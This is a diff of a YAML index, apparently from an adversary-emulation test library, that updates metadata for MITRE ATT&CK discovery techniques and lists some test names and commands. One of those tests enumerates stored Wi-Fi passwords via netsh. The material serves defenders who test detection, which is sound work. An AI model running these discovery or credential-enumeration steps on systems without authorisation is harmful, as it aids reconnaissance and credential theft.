@@ -82819,7 +83523,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests:
     - name: Basic Permission Groups Discovery Windows (Domain)
@@ -83121,7 +83824,7 @@ discovery:
         name: command_prompt
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -83162,7 +83865,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests:
     - name: System Service Discovery
@@ -83212,7 +83914,7 @@ discovery:
         command: powershell.exe Get-Service
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -83297,7 +83999,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture Windows Command Prompt
@@ -83474,7 +84175,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests:
     - name: Network Share Discovery command prompt
@@ -83663,7 +84363,7 @@ discovery:
         elevation_required: false
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -83714,7 +84414,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests:
     - name: Win32_PnPEntity Hardware Inventory
@@ -83765,7 +84464,7 @@ discovery:
           '
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -83776,7 +84475,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -83791,7 +84489,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -83839,7 +84536,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests:
     - name: System Information Discovery
@@ -84334,7 +85032,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests:
     - name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
@@ -84349,7 +85046,7 @@ discovery:
         elevation_required: false
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -84391,12 +85088,11 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests:
     - name: List Process Main Windows - C# .NET
@@ -84438,112 +85134,64 @@ discovery:
         name: command_prompt
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -84558,6 +85206,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -84567,9 +85221,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -84579,102 +85238,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -84728,7 +85422,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests:
     - name: List Google Chrome / Opera Bookmarks on Windows with powershell
@@ -84851,7 +85544,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -84889,7 +85582,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests:
     - name: System Network Configuration Discovery on Windows
@@ -85059,7 +85751,7 @@ discovery:
         name: command_prompt
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -85086,14 +85778,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -85122,7 +85813,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -85182,7 +85872,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
